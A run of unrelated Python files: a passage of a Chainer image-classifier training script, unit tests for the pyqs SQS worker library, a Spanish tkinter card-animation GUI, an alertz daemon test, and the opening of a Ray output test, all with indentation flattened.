# Data loading routine
image = np.asarray(Image.open(path)).transpose(2, 0, 1)
if center:
top = left = cropwidth / 2
else:
top = random.randint(0, cropwidth - 1)
left = random.randint(0, cropwidth - 1)
bottom = model.insize + top
right = model.insize + left
image = image[:, top:bottom, left:right].astype(np.float32)
image -= mean_image[:, top:bottom, left:right]
image /= 255
if flip and random.randint(0, 1) == 0:
return image[:, :, ::-1]
else:
return image
def feed_data():
# Data feeder
i = 0
count = 0
x_batch = np.ndarray(
(args.batchsize, 3, model.insize, model.insize), dtype=np.float32)
y_batch = np.ndarray((args.batchsize,), dtype=np.int32)
val_x_batch = np.ndarray(
(args.val_batchsize, 3, model.insize, model.insize), dtype=np.float32)
val_y_batch = np.ndarray((args.val_batchsize,), dtype=np.int32)
batch_pool = [None] * args.batchsize
val_batch_pool = [None] * args.val_batchsize
pool = multiprocessing.Pool(args.loaderjob)
data_q.put('train')
for epoch in six.moves.range(1, 1 + args.epoch):
print('epoch', epoch, file=sys.stderr)
print('learning rate', optimizer.lr, file=sys.stderr)
perm = np.random.permutation(len(train_list))
for idx in perm:
path, label = train_list[idx]
batch_pool[i] = pool.apply_async(read_image, (path, False, True))
y_batch[i] = label
i += 1
if i == args.batchsize:
for j, x in enumerate(batch_pool):
x_batch[j] = x.get()
data_q.put((x_batch.copy(), y_batch.copy()))
i = 0
count += 1
if count % 1000 == 0:
data_q.put('val')
j = 0
for path, label in val_list:
val_batch_pool[j] = pool.apply_async(
read_image, (path, True, False))
val_y_batch[j] = label
j += 1
if j == args.val_batchsize:
for k, x in enumerate(val_batch_pool):
val_x_batch[k] = x.get()
data_q.put((val_x_batch.copy(), val_y_batch.copy()))
j = 0
data_q.put('train')
optimizer.lr *= 0.97
pool.close()
pool.join()
data_q.put('end')
def log_result():
# Logger
train_count = 0
train_cur_loss = 0
train_cur_accuracy = 0
begin_at = time.time()
val_begin_at = None
while True:
result = res_q.get()
if result == 'end':
print(file=sys.stderr)
break
elif result == 'train':
print(file=sys.stderr)
train = True
if val_begin_at is not None:
begin_at += time.time() - val_begin_at
val_begin_at = None
continue
elif result == 'val':
print(file=sys.stderr)
train = False
val_count = val_loss = val_accuracy = 0
val_begin_at = time.time()
continue
loss, accuracy = result
if train:
train_count += 1
duration = time.time() - begin_at
throughput = train_count * args.batchsize / duration
sys.stderr.write(
'\rtrain {} updates ({} samples) time: {} ({} images/sec)'
.format(train_count, train_count * args.batchsize,
datetime.timedelta(seconds=duration), throughput))
train_cur_loss += loss
train_cur_accuracy += accuracy
if train_count % 1000 == 0:
mean_loss = train_cur_loss / 1000
mean_error = 1 - train_cur_accuracy / 1000
print(file=sys.stderr)
print(json.dumps({'type': 'train', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
train_cur_loss = 0
train_cur_accuracy = 0
else:
val_count += args.val_batchsize
duration = time.time() - val_begin_at
throughput = val_count / duration
sys.stderr.write(
'\rval {} batches ({} samples) time: {} ({} images/sec)'
.format(val_count / args.val_batchsize, val_count,
datetime.timedelta(seconds=duration), throughput))
val_loss += loss
val_accuracy += accuracy
if val_count == 50000:
mean_loss = val_loss * args.val_batchsize / 50000
mean_error = 1 - val_accuracy * args.val_batchsize / 50000
print(file=sys.stderr)
print(json.dumps({'type': 'val', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
def train_loop():
# Trainer
graph_generated = False
while True:
while data_q.empty():
time.sleep(0.1)
inp = data_q.get()
if inp == 'end': # quit
res_q.put('end')
break
elif inp == 'train': # restart training
res_q.put('train')
model.train = True
continue
elif inp == 'val': # start validation
res_q.put('val')
serializers.save_hdf5(args.out, model)
serializers.save_hdf5(args.outstate, optimizer)
model.train = False
continue
volatile = 'off' if model.train else 'on'
x = chainer.Variable(xp.asarray(inp[0]), volatile=volatile)
t = chainer.Variable(xp.asarray(inp[1]), volatile=volatile)
if model.train:
optimizer.update(model, x, t)
if not graph_generated:
with open('graph.dot', 'w') as o:
o.write(computational_graph.build_computational_graph(
(model.loss,)).dump())
print('generated graph', file=sys.stderr)
graph_generated = True
else:
model(x, t)
res_q.put((float(model.loss.data), float(model.accuracy.data)))
del x, t
# Invoke threads
feeder = threading.Thread(target=feed_data)
feeder.daemon = True
feeder.start()
logger = threading.Thread(target=log_result)
logger.daemon = True
logger.start()
train_loop()
feeder.join()
logger.join()
# Save final model
serializers.save_hdf5(args.out, model)
serializers.save_hdf5(args.outstate, optimizer)
|
test_worker.py
|
import json
import logging
import time
import threading
from multiprocessing import Queue
try:
from queue import Empty
except ImportError:
from Queue import Empty
import boto3
from moto import mock_sqs
from mock import patch, Mock
from pyqs.worker import (
ManagerWorker, ReadWorker, ProcessWorker, BaseWorker,
MESSAGE_DOWNLOAD_BATCH_SIZE,
)
from pyqs.utils import decode_message
from tests.tasks import task_results
from tests.utils import MockLoggingHandler
BATCHSIZE = 10
INTERVAL = 0.1
@mock_sqs
def test_worker_fills_internal_queue():
"""
Test read workers fill internal queue
"""
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
message = json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue()
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE, parent_id=1)
worker.read_message()
packed_message = internal_queue.get(timeout=1)
found_message_body = decode_message(packed_message['message'])
found_message_body.should.equal({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
@mock_sqs
def test_worker_fills_internal_queue_only_until_maximum_queue_size():
"""
Test read workers fill internal queue only to maximum size
"""
conn = boto3.client('sqs', region_name='us-east-1')
# Set visibility timeout low to improve test speed
queue_url = conn.create_queue(
QueueName="tester", Attributes={'VisibilityTimeout': '1'})['QueueUrl']
message = json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
for i in range(3):
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue(maxsize=2)
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE, parent_id=1)
worker.read_message()
# The internal queue should only have two messages on it
internal_queue.get(timeout=1)
internal_queue.get(timeout=1)
try:
internal_queue.get(timeout=1)
except Empty:
pass
else:
raise AssertionError("The internal queue should be empty")
@mock_sqs
def test_worker_fills_internal_queue_from_celery_task():
"""
Test read workers fill internal queue with celery tasks
"""
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
message = (
'{"body": "KGRwMApTJ3Rhc2snCnAxClMndGVzdHMudGFza3MuaW5kZXhfa'
'W5jcmVtZW50ZXInCnAyCnNTJ2Fy\\nZ3MnCnAzCihscDQKc1Mna3dhcmdzJw'
'pwNQooZHA2ClMnbWVzc2FnZScKcDcKUydUZXN0IG1lc3Nh\\nZ2UyJwpwOAp'
'zcy4=\\n", "some stuff": "asdfasf"}'
)
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue()
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE, parent_id=1)
worker.read_message()
packed_message = internal_queue.get(timeout=1)
found_message_body = decode_message(packed_message['message'])
found_message_body.should.equal({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message2',
},
})
@mock_sqs
def test_worker_processes_tasks_from_internal_queue():
"""
Test worker processes read from internal queue
"""
del task_results[:]
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to queue
internal_queue = Queue()
internal_queue.put(
{
"message": message,
"queue": queue_url,
"start_time": time.time(),
"timeout": 30,
}
)
# Process message
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
task_results.should.equal(['Test message'])
# We expect the queue to be empty now
try:
internal_queue.get(timeout=1)
except Empty:
pass
else:
raise AssertionError("The internal queue should be empty")
@mock_sqs
def test_worker_fills_internal_queue_and_respects_visibility_timeouts():
"""
Test read workers respect visibility timeouts
"""
# Setup logging
logger = logging.getLogger("pyqs")
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(
QueueName="tester", Attributes={'VisibilityTimeout': '1'})['QueueUrl']
# Add MEssages
message = json.dumps(
{
"body": (
"KGRwMApTJ3Rhc2snCnAxClMndGVzdHMudGFza3MuaW5kZXhfaW5jcmVtZW"
"50ZXInCnAyCnNTJ2Fy\nZ3MnCnAzCihscDQKc1Mna3dhcmdzJwpwNQooZHA"
"2ClMnbWVzc2FnZScKcDcKUydUZXN0IG1lc3Nh\nZ2UyJwpwOApzcy4=\n"
),
"some stuff": "asdfasf",
}
)
for _ in range(3):
conn.send_message(QueueUrl=queue_url, MessageBody=message)
# Run Reader
internal_queue = Queue(maxsize=1)
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE, parent_id=1)
worker.read_message()
# Check log messages
logger.handlers[0].messages['warning'][0].should.contain(
"Timed out trying to add the following message to the internal queue")
logger.handlers[0].messages['warning'][1].should.contain(
"Clearing Local messages since we exceeded their visibility_timeout")
@mock_sqs
def test_worker_processes_tasks_and_logs_correctly():
"""
Test worker processes logs INFO correctly
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue()
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
# Process message
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
# Check output
kwargs = json.loads(message['Body'])['kwargs']
expected_result = (
u"Processed task tests.tasks.index_incrementer in 0.0000 seconds "
"with args: [] and kwargs: {}".format(kwargs)
)
logger.handlers[0].messages['info'].should.equal([expected_result])
@mock_sqs
def test_worker_processes_tasks_and_logs_warning_correctly():
"""
Test worker processes logs WARNING correctly
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue()
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
# Process message
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
# Check output
kwargs = json.loads(message['Body'])['kwargs']
msg1 = (
"Task tests.tasks.index_incrementer raised error in 0.0000 seconds: "
"with args: [] and kwargs: {}: "
"Traceback (most recent call last)".format(kwargs)
) # noqa
logger.handlers[0].messages['error'][0].lower().should.contain(
msg1.lower())
msg2 = (
'ValueError: Need to be given basestring, '
'was given 23'
) # noqa
logger.handlers[0].messages['error'][0].lower().should.contain(
msg2.lower())
@mock_sqs
def test_worker_processes_empty_queue():
"""
Test worker processes read from empty internal queue
"""
internal_queue = Queue()
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
@patch("pyqs.worker.os")
def test_parent_process_death(os):
"""
Test worker processes recognize parent process death
"""
os.getppid.return_value = 123
worker = BaseWorker(parent_id=1)
worker.parent_is_alive().should.be.false
@patch("pyqs.worker.os")
def test_parent_process_alive(os):
"""
Test worker processes recognize when parent process is alive
"""
os.getppid.return_value = 1234
worker = BaseWorker(parent_id=1234)
worker.parent_is_alive().should.be.true
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_alive_and_should_not_exit(os):
"""
Test read workers do not exit when parent is alive and shutdown is not set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1
# Setup dummy read_message
def read_message():
raise Exception("Called")
# When I have a parent process, and shutdown is not set
worker = ReadWorker(queue_url, "foo", BATCHSIZE, parent_id=1)
worker.read_message = read_message
# Then read_message() is reached
worker.run.when.called_with().should.throw(Exception, "Called")
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_alive_and_should_exit(os):
"""
Test read workers exit when parent is alive and shutdown is set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1234
# Setup internal queue
q = Queue(1)
# When I have a parent process, and shutdown is set
worker = ReadWorker(queue_url, q, BATCHSIZE, parent_id=1)
worker.read_message = Mock()
worker.shutdown()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_dead_and_should_not_exit(os):
"""
Test read workers exit when parent is dead and shutdown is not set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 123
# Setup internal queue
q = Queue(1)
# When I have no parent process, and shutdown is not set
worker = ReadWorker(queue_url, q, BATCHSIZE, parent_id=1)
worker.read_message = Mock()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_alive_and_should_not_exit(os):
"""
Test worker processes do not exit when parent is alive and shutdown
is not set
"""
# Setup PPID
os.getppid.return_value = 1
# Setup dummy read_message
def process_message():
raise Exception("Called")
# When I have a parent process, and shutdown is not set
worker = ProcessWorker("foo", INTERVAL, parent_id=1)
worker.process_message = process_message
# Then process_message() is reached
worker.run.when.called_with().should.throw(Exception, "Called")
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_dead_and_should_not_exit(os):
"""
Test worker processes exit when parent is dead and shutdown is not set
"""
# Setup PPID
os.getppid.return_value = 1
# When I have no parent process, and shutdown is not set
worker = ProcessWorker("foo", INTERVAL, parent_id=1)
worker.process_message = Mock()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_alive_and_should_exit(os):
"""
Test worker processes exit when parent is alive and shutdown is set
"""
# Setup PPID
os.getppid.return_value = 1234
# When I have a parent process, and shutdown is set
worker = ProcessWorker("foo", INTERVAL, parent_id=1)
worker.process_message = Mock()
worker.shutdown()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_worker_processes_shuts_down_after_processing_its_max_number_of_msgs(
os):
"""
Test worker processes shutdown after processing maximum number of messages
"""
os.getppid.return_value = 1
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue(3)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
# When I Process messages
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker._messages_to_process_before_shutdown = 2
# Then I return from run()
worker.run().should.be.none
# With messages still on the queue
internal_queue.empty().should.be.false
internal_queue.full().should.be.false
@mock_sqs
def test_worker_processes_discard_tasks_that_exceed_their_visibility_timeout():
"""
Test worker processes discards tasks that exceed their visibility timeout
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue with timeout of 0 that started long ago
internal_queue = Queue()
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": 0,
"timeout": 0,
}
)
# When I process the message
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker.process_message()
# Then I get an error about exceeding the visibility timeout
kwargs = json.loads(message['Body'])['kwargs']
msg1 = (
"Discarding task tests.tasks.index_incrementer with args: [] "
"and kwargs: {} due to exceeding "
"visibility timeout"
).format(kwargs) # noqa
logger.handlers[0].messages['warning'][0].lower().should.contain(
msg1.lower())
@mock_sqs
def test_worker_processes_only_incr_processed_counter_if_a_msg_was_processed():
"""
Test worker process only increases processed counter if a message was
processed
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue(3)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
# And we add a message to the queue later
def sleep_and_queue(internal_queue):
time.sleep(1)
internal_queue.put(
{
"queue": queue_url,
"message": message,
"start_time": time.time(),
"timeout": 30,
}
)
thread = threading.Thread(target=sleep_and_queue, args=(internal_queue,))
thread.daemon = True
thread.start()
# When I Process messages
worker = ProcessWorker(internal_queue, INTERVAL, parent_id=1)
worker._messages_to_process_before_shutdown = 2
# Then I return from run() after processing 2 messages
worker.run().should.be.none
@mock_sqs
def test_worker_negative_batch_size():
"""
Test workers with negative batch sizes
"""
BATCHSIZE = -1
CONCURRENCY = 1
QUEUE_PREFIX = "tester"
INTERVAL = 0.0
conn = boto3.client('sqs', region_name='us-east-1')
conn.create_queue(QueueName="tester")['QueueUrl']
worker = ManagerWorker(QUEUE_PREFIX, CONCURRENCY, INTERVAL, BATCHSIZE)
worker.batchsize.should.equal(1)
@mock_sqs
def test_worker_to_large_batch_size():
"""
Test workers with too large of a batch size
"""
BATCHSIZE = 10000
CONCURRENCY = 1
QUEUE_PREFIX = "tester"
INTERVAL = 0.0
conn = boto3.client('sqs', region_name='us-east-1')
conn.create_queue(QueueName="tester")['QueueUrl']
worker = ManagerWorker(QUEUE_PREFIX, CONCURRENCY, INTERVAL, BATCHSIZE)
worker.batchsize.should.equal(MESSAGE_DOWNLOAD_BATCH_SIZE)
|
Interfaz2.2.py
|
try:
import tkinter as tk
except:
import Tkinter as tk
import threading
import random
class Tarjeta(tk.Canvas):
"""docstring for Tarjeta"""
def __init__(self, master = None, width = None, height = None, color = None, image = None, **kwargs):
bg = master["bg"]
super(Tarjeta, self).__init__(master = master, width = width, height = height, bg = bg, **kwargs)
self.master = master
self.width = width
self.height = height
self.coordenadas = [20, 20, self.width - 20, self.height - 20]
self.color = color
self.shape = self.create_polygon(self.coordenadas[0], self.coordenadas[1], self.coordenadas[2],
self.coordenadas[1], self.coordenadas[2], self.coordenadas[3], self.coordenadas[0], self.coordenadas[3], fill = self.color)
print("<class Tarjeta>")
self.bind("<Button-1>", self.press)
def press(self, event = None):
def animaiton(verticalArriba, verticalAbajo, horizontalDrcha, horizontalIzq, Increase = 1):
tamano = -5 * Increase
verticalArriba *= Increase
verticalAbajo *= Increase
horizontalDrcha *= Increase
horizontalIzq *= Increase
for i in range(10):
coordenadas = self.coords(self.shape)
self.coords(self.shape, coordenadas[0] - tamano, coordenadas[1] - tamano,
coordenadas[2] + tamano, coordenadas[3] - tamano, coordenadas[4] + tamano,
coordenadas[5] + tamano, coordenadas[6] - tamano, coordenadas[7] + tamano)
self.master.update()
self.master.after(10)
tamano = 0
for i in range(10):
coordenadas = self.coords(self.shape)
self.coords(self.shape, coordenadas[0] + verticalArriba - tamano, coordenadas[1] + horizontalIzq - tamano,
coordenadas[2] - verticalArriba + tamano, coordenadas[3] + horizontalDrcha - tamano, coordenadas[4] - verticalAbajo + tamano,
coordenadas[5] + horizontalIzq + tamano, coordenadas[6] + verticalAbajo - tamano, coordenadas[7] + horizontalDrcha + tamano)
self.master.update()
self.master.after(10)
self.master.after(10)
x = (self.coordenadas[0]+self.coordenadas[2])/2
y = (self.coordenadas[1]+self.coordenadas[3])/2
coordenadas = self.coords(self.shape)
verticalArriba = -2
verticalAbajo = -2
horizontalDrcha = -2
horizontalIzq = -2
if event.x < x:
horizontalIzq = 2
else:
horizontalDrcha = 2
if event.y < y:
verticalArriba = 2
else:
verticalAbajo = 2
animaiton(verticalArriba, verticalAbajo, horizontalDrcha, horizontalIzq, Increase = 1)
animaiton(verticalArriba, verticalAbajo, horizontalDrcha, horizontalIzq, Increase = -1)
self.master.after(15)
def DetectButton(ID, event = None):
ID.config(bg = "#212f3d") #"#17202a")
def LeaveButton(ID, event = None):
ID.config(bg = "#1c2833")
def moveHeader(event = None, operator = '<', number = -8):
if operator == "<":
frameHeader.unbind("<Motion>")
frameHeader.bind('<Leave>', lambda event, arg1 = '>', arg2 = -50: moveHeader(event, arg1, arg2))
else:
frameHeader.unbind('<Leave>')
frameHeader.bind("<Motion>", moveHeader)
x = int(frameHeader.place_info()['x'])
y = int(frameHeader.place_info()['y'])
condition = eval(str(y) + operator + str(number))
while condition:
condition = eval(str(y) + operator + str(number))
try:
if operator == "<":
frameHeader.place(x = x, y = y+1)
else:
frameHeader.place(x = x, y = y-1)
except: pass
window.update()
window.after(2)
x = int(frameHeader.place_info()["x"])
y = int(frameHeader.place_info()["y"])
def movHeader(event = None, operator = '<', number = -8):
hilo = threading.Thread(target = mHeader, args = (operator, number), daemon = True)
hilo.start()
# ==========================================================================================
# MAIN
# ==========================================================================================
window = tk.Tk()
print(window.winfo_screenwidth())
window.title("Homogeneous Project")
f = tk.Frame(window, width = 1250, height = 700, bg = "#308180")
f.pack()
'''
foto = tk.PhotoImage(file="./Images/a.png")
label = tk.Label(f, image=foto)
label.place(x = 0, y = 0)
label.photo = foto
'''
frameHeader = tk.Frame(f, width = int(f["width"]), height = 62, bg = "gray12")
frameHeader.place(x = 0, y = -50)
NwUsr = Tarjeta(f, height = 400, width = 300, highlightthickness = 0, color = "black")
foto = tk.PhotoImage(file="./Images/SignUp.png")
label = tk.Label(f, image=foto)
label.place(x = 70, y = (f["height"])/2 - int(NwUsr["height"])/2 + 100)
NwUsr.place(x = 0, y = (f["height"])/2 - int(NwUsr["height"])/2)
i = 0
while int(NwUsr.place_info()["x"]) < int(f["width"])/2 - int(NwUsr["height"])/2 + 50:
i += 8
NwUsr.place(x = i, y = (f["height"])/2 - int(NwUsr["height"])/2)
label.place(x = i+70, y = (f["height"])/2 - int(NwUsr["height"])/2 + 100)
window.update()
window.after(3)
x = int(NwUsr.place_info()["x"])
for i in range(10):
NwUsr.place(x = x-i*5, y = (f["height"])/2 - int(NwUsr["height"])/2)
label.place(x = (x+70)-i*5, y = (f["height"])/2 - int(NwUsr["height"])/2 + 100)
window.update()
window.after(15)
label.bind("<Button-1>", NwUsr.press)
frameHome = tk.Frame(f, width = 200, height = 700, bg = "#17202a")
frameHome.place(x = -1000, y = 0) # x = 0
NumButtons = 6
Buttons = []
for Button in range(NumButtons):
B = tk.Label(frameHome, width = 24, height = 4, bg = "#1c2833")
B.place(x = -1000, y = Button*62) # 212f3d # x = 0
Buttons.append(B)
OptionSqrs = []
colors = []
Jugadores = []
for i in range(len(Jugadores)):
O = tk.Label(frameHome, width = 24, height = 4, bg = "#1c2833")
# ------------------------------------------------------------------------------------------
# EVENTS AND BINDINGS
# ------------------------------------------------------------------------------------------
frameHeader.bind('<Motion>', moveHeader)
frameHeader.bind('<Leave>', lambda event, arg1 = '>', arg2 = -50: moveHeader(event, arg1, arg2))
list(map(lambda Button: Button.bind("<Motion>", lambda event,
arg = Button: DetectButton(arg, event)), Buttons))
list(map(lambda Button: Button.bind("<Leave>", lambda event,
arg = Button: LeaveButton(arg, event)), Buttons))
window.bind("<Escape>", quit)
tk.mainloop()
|
test_with_dummy_client.py
|
#!/usr/bin/env python3
# testWithDummyClient.py
import os
import threading
import time
import unittest
# from io import StringIO # UNUSED
from rnglib import SimpleRNG
from wireops.chan import Channel
# import wireops.typed as T # AS YET UNUSED
# import fieldz.msg_spec as M # AS YET UNUSED
# from fieldz.parser import StringProtoSpecParser # AS YET UNUSED
# from fieldz.msg_impl import make_msg_class, make_field_class # UNUSED
from alertz import(CORRUPT_LIST_MSG, ZONE_MISMATCH_MSG,
__version__, __version_date__, Namespace, BUFSIZE)
from alertz.chan_io import send_to_end_point
from alertz.daemon import run_the_daemon, clear_logs
# from alertz_proto_spec import ALERTZ_PROTO_SPEC # AS YET UNUSED
RNG = SimpleRNG(time.time())
class TestWithDummyClient(unittest.TestCase):
next_seq_nbr = 0 # increment after each use
def setUp(self):
pass
def tearDown(self):
pass
# utility functions ---------------------------------------------
def do_clear_logs(self, options):
self.assertIsNotNone(options)
log_dir = options.log_dir
self.assertIsNotNone(log_dir)
if not os.path.exists(log_dir):
os.mkdir(log_dir)
self.assertTrue(os.path.exists(log_dir))
clear_logs(options)
# excessive paranoia
files = os.listdir(log_dir)
if files:
self.fail('logs/ has not been cleared')
# -----------------------------------------------------
def zone_mismatch_fields(self):
""" returns a list """
timestamp = int(time.time())
seq_nbr = TestWithDummyClient.next_seq_nbr
TestWithDummyClient.next_seq_nbr += 1 # used, so increment it
zone_name = RNG.next_file_name(8)
expected_serial = RNG.next_int32()
actual_serial = RNG.next_int32()
while actual_serial == expected_serial:
actual_serial = RNG.next_int32()
# NOTE that this is a list
return [timestamp, seq_nbr, zone_name, expected_serial, actual_serial]
def next_zone_mismatch_msg(self):
values = self.zone_mismatch_fields()
return ZONE_MISMATCH_MSG(values)
# -----------------------------------------------------
def corrupt_list_fields(self):
timestamp = int(time.time())
seq_nbr = TestWithDummyClient.next_seq_nbr
TestWithDummyClient.next_seq_nbr += 1 # used, so increment it
remarks = RNG.next_file_name(16)
return [timestamp, seq_nbr, remarks]
def next_corrupt_list_msg(self):
values = self.corrupt_list_fields()
return CORRUPT_LIST_MSG(values) # GEEP
# -----------------------------------------------------
def shutdown_fields(self):
# global next_seq_nbr
# timestamp = int(time.time())
# seqNbr = next_seq_nbr
# next_seq_nbr += 1 # used, so increment it
remarks = RNG.next_file_name(16)
return [remarks, ]
def next_shutdown_msg(self):
values = self.shutdown_fields()
return shutdown_msg_cls(values) # GEEP
# actual unit test(s) -------------------------------------------
def test_the_daemon(self):
chan = Channel(BUFSIZE)
chan.clear() # XXX should be guaranteed on new channel
msg_count = 8 + RNG.next_int16(25) # so 8..32
# DEBUG
print("MSG_COUNT = %u" % msg_count)
# END
# set up options ----------------------------------
now = int(time.time())
pgm_name_and_version = "testWithDummyClient v%s %s" % (
__version__, __version_date__)
with open('/etc/hostname', 'r') as file:
this_host = file.read().strip()
options = {} # a namespace, so to speak
options['ec2Host'] = False
options['justShow'] = False
options['log_dir'] = 'logs'
options['pgm_name_and_version'] = pgm_name_and_version
options['port'] = 55555
options['showTimestamp'] = False
options['showVersion'] = False
options['testing'] = True
options['this_host'] = this_host
options['timestamp'] = now
options['verbose'] = False
ns_ = Namespace(options)
# clear the log files (so delete any files under logs/) -----
self.do_clear_logs(ns_)
# start the daemon --------------------------------
daemon_t = threading.Thread(target=run_the_daemon, args=(ns_,))
daemon_t.start()
# give the daemon time to wake up --------------------------
time.sleep(0.15) # XXX without this we get an abort saying
# that libev cannot allocate (2G - 16)B
# start sending (some fixed number of ) messages ------------
msgs_sent = []
for nnn in range(msg_count):
msg = self.next_zone_mismatch_msg()
seq_nbr_field = msg[1]
# XXX by name would be better!
self.assertEqual(nnn, seq_nbr_field.value)
# serialize msg into the channel
chan.clear()
msg.write_stand_alone(chan)
chan.flip()
# send the msg to the daemon ------------------
skt = send_to_end_point(chan, '127.0.0.1', 55555)
time.sleep(0.05)
skt.close()
msgs_sent.append(msg)
# DEBUG
print("MSG %d HAS BEEN SENT" % nnn)
# END
self.assertEqual(msg_count, len(msgs_sent))
# delay a few ms --------------------------------------------
time.sleep(0.05)
# build and send shutdown msg -------------------------------
msg = self.next_shutdown_msg()
chan.clear()
msg.write_stand_alone(chan)
chan.flip()
skt = send_to_end_point(chan, '127.0.0.1', 55555)
# DEBUG
print("SHUTDOWN MSG HAS BEEN SENT")
# END
# delay a few ms --------------------------------------------
time.sleep(0.05)
skt.close()
# join the daemon thread ------------------------------------
time.sleep(0.05)
daemon_t.join()
# verify that the daemon's logs have the expected contents --
# XXX STUB XXX
if __name__ == '__main__':
unittest.main()
|
test_output.py
|
import subprocess
import sys
import pytest
import re
import ray
from ray._private.test_utils import run_string_as_driver_nonblocking
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_fail_importing_actor(ray_start_regular, error_pubsub):
script = """
import os
import sys
import tempfile
import ray
ray.init()
temporary_python_file = '''
def temporary_helper_function():
return 1
'''
f = tempfile.NamedTemporaryFile(suffix=".py")
f.write(temporary_python_file.encode("ascii"))
f.flush()
